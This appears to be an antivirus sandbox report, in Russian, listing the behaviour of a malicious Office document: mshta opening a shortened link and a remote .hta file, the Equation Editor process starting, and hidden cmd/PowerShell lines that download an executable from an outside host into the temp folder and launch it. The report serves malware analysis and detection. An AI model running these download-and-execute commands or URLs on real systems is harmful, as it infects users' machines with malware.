Техническая информация
- '<SYSTEM32>\mshta.exe' http://bi#.ly/2SqLWAk &AAAAAAAAAAAAAAAC
- %HOMEPATH%\cookies\user@bit[1].txt
- http://bi#.ly/2SqLWAk
- http://ne##ux.in/img/bn.hta
- DNS ASK bi#.ly
- DNS ASK ne##ux.in
- ClassName: 'MsoHelp11' WindowName: ''
- '<SYSTEM32>\mshta.exe' http://bi#.ly/2SqLWAk &AAAAAAAAAAAAAAAC' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://www.co#####onamento-viti.it/img/1/smbn.exe','%temp%\smbn.exe'); Start '%temp%\smbn.exe'' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://www.co#####onamento-viti.it/img/1/smbn.exe','%temp%\smbn.exe'); Start '%temp%\smbn.exe'